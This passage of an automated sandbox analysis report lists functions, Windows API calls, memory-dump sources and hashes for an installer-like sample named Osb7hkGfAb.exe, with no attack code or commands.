                                                                          • Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4
                                                                          Function 00405796 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                                          • CloseHandle.KERNEL32(?), ref: 004057CC
                                                                          Strings
                                                                          • Error launching installer, xrefs: 004057A9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateHandleProcess
                                                                          • String ID: Error launching installer
                                                                          • API String ID: 3712363035-66219284
                                                                          • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                                          • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                                          • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                                          • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                                                                          Function 00402588 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025BA
                                                                          • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025CD
                                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsc72B9.tmp,00000000,00000011,00000002), ref: 004025E5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Enum$CloseValue
                                                                          • String ID:
                                                                          • API String ID: 397863658-0
                                                                          • Opcode ID: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                                          • Instruction ID: ee0fd62ac357f9525b55a30647733f0e3798e9bebba0400de635a53faed38b57
                                                                          • Opcode Fuzzy Hash: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                                          • Instruction Fuzzy Hash: 22017C71604204FFE7219F549E99ABF7ABCEF40358F20403EF505A61C0DAB88A459629
                                                                          Function 00402516 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402546
                                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsc72B9.tmp,00000000,00000011,00000002), ref: 004025E5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CloseQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3356406503-0
                                                                          • Opcode ID: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
                                                                          • Instruction ID: 101e8c123746c764c526cee79e76b60048690b918ccacca24166b7bb3c1ff757
                                                                          • Opcode Fuzzy Hash: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
                                                                          • Instruction Fuzzy Hash: EA11C171A00205EFDF25DF64CE985AE7AB4EF00355F20843FE446B72C0D6B88A86DB19
                                                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                                          • Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
                                                                          • Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                                          • Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D
                                                                          Function 00402421 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402442
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040244B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CloseDeleteValue
                                                                          • String ID:
                                                                          • API String ID: 2831762973-0
                                                                          • Opcode ID: 07b32314aa9a422e600aa3f6776080c68f979d551996adedd097d7eb0a26439f
                                                                          • Instruction ID: 28034f9d49707e31730e5ee4ae5769526bd8744af0d0927f07882998c216e066
                                                                          • Opcode Fuzzy Hash: 07b32314aa9a422e600aa3f6776080c68f979d551996adedd097d7eb0a26439f
                                                                          • Instruction Fuzzy Hash: E3F09632600121DBE720BFA49B8EAAE72A59B40314F25453FF602B71C1D9F84E4246AE
                                                                          Function 00401EC5 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401EE3
                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401EEE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnableShow
                                                                          • String ID:
                                                                          • API String ID: 1136574915-0
                                                                          • Opcode ID: 8b7817ca22b79e9cee4aa1cb1be03623fa11f3862aed9c5f3b00cb70b3c6cfe0
                                                                          • Instruction ID: 2686c2d45ba130581374544c13beebfcaf73fd10f5aa92b185336ae358fe78f7
                                                                          • Opcode Fuzzy Hash: 8b7817ca22b79e9cee4aa1cb1be03623fa11f3862aed9c5f3b00cb70b3c6cfe0
                                                                          • Instruction Fuzzy Hash: 69E09232B04200EFD714EFA5EA8856E7BB0EB40325B20413FF001F20C1DAB848418A69
                                                                          Function 00406500 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                            • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                                            • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                                                                            • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                          • String ID:
                                                                          • API String ID: 2547128583-0
                                                                          • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                                          • Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
                                                                          • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                                          • Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D
                                                                          Function 00405C90 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Osb7hkGfAb.exe,80000000,00000003), ref: 00405C94
                                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: File$AttributesCreate
                                                                          • String ID:
                                                                          • API String ID: 415043291-0
                                                                          • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                          • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                                          • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                          • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                                          Function 00405761 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                                                                          • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1375471231-0
                                                                          • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                          • Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
                                                                          • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                          • Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D
                                                                          Function 700E2A38 Relevance: 1.6, APIs: 1, Instructions: 143memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(00000000), ref: 700E2AF7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2805650198.00000000700E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 700E0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2805623249.00000000700E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2805669903.00000000700E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2805690432.00000000700E5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_700e0000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: a5d505929d95919e3e8ba72ef98083de012b084f8f884a0c94e3a694be7bfcaf
                                                                          • Instruction ID: 0d0d66c9bcd109ee7a62d35f2dbc52cdd62128675d816c9b7082ab4680971cec
                                                                          • Opcode Fuzzy Hash: a5d505929d95919e3e8ba72ef98083de012b084f8f884a0c94e3a694be7bfcaf
                                                                          • Instruction Fuzzy Hash: 1B413A739002049FEB25FFB7DC82B5D77B5EB44B34F20543EE605B6262C774A9808AA1
                                                                          Function 0040266D Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: wsprintf
                                                                          • String ID:
                                                                          • API String ID: 2111968516-0
                                                                          • Opcode ID: 367ecb1198001a867d8e3b7756d3c175cfd735077116dd6966e3788219f0b2a9
                                                                          • Instruction ID: 7f5a5d1368c13d317d2e99ee4d98356b480ceadea176dd08c5889da6900fd1c4
                                                                          • Opcode Fuzzy Hash: 367ecb1198001a867d8e3b7756d3c175cfd735077116dd6966e3788219f0b2a9
                                                                          • Instruction Fuzzy Hash: 7E21B730D04299FADF328BA885886AEBB749F11314F1440BFE491B73D1C2BD8A85DB19
                                                                          Function 0040166A Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 00401685
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: FileMove
                                                                          • String ID:
                                                                          • API String ID: 3562171763-0
                                                                          • Opcode ID: 1edc5c0a003d732ce3bee6573eefb30b8b2fa69015ea7de72e37931521f2516e
                                                                          • Instruction ID: c16fe538d576f0a812f108a5c598968f2bbae53de2c44bc87e09c6d73b5458c5
                                                                          • Opcode Fuzzy Hash: 1edc5c0a003d732ce3bee6573eefb30b8b2fa69015ea7de72e37931521f2516e
                                                                          • Instruction Fuzzy Hash: EEF01D3160852496DB20ABA54E49E5F3264DB42769B24033BF422B21D1EABC8542956E
                                                                          Function 0040272B Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402749
                                                                            • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: FilePointerwsprintf
                                                                          • String ID:
                                                                          • API String ID: 327478801-0
                                                                          • Opcode ID: 6490c60e78b8e72c9ff7044d1ebd2fda03870678213011db9787ff048aa9e55a
                                                                          • Instruction ID: d2cb0ca5e863be2ef59b536234997f243a65a7806d73518010ac019a9530af38
                                                                          • Opcode Fuzzy Hash: 6490c60e78b8e72c9ff7044d1ebd2fda03870678213011db9787ff048aa9e55a
                                                                          • Instruction Fuzzy Hash: 7EE09271B00114EED711FBA4AE49DBF77B8EB40315B10403BF102F10C1CABC49128A2E
                                                                          Function 0040239C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023D5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfileStringWrite
                                                                          • String ID:
                                                                          • API String ID: 390214022-0
                                                                          • Opcode ID: cd8b371b6f55f1d33d0eddf2f35f8062392e7128ea2648a4caa2e71cbd90ff81
                                                                          • Instruction ID: a2264a5e3b04165b7de03e79847980bb6a424129cbe2f78830b73284cd35be0b
                                                                          • Opcode Fuzzy Hash: cd8b371b6f55f1d33d0eddf2f35f8062392e7128ea2648a4caa2e71cbd90ff81
                                                                          • Instruction Fuzzy Hash: F8E04831610114ABD7203EB14F8D97F31A9DB44304B34153FBA11761C6D9FC5C414279
                                                                          Function 0040171F Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
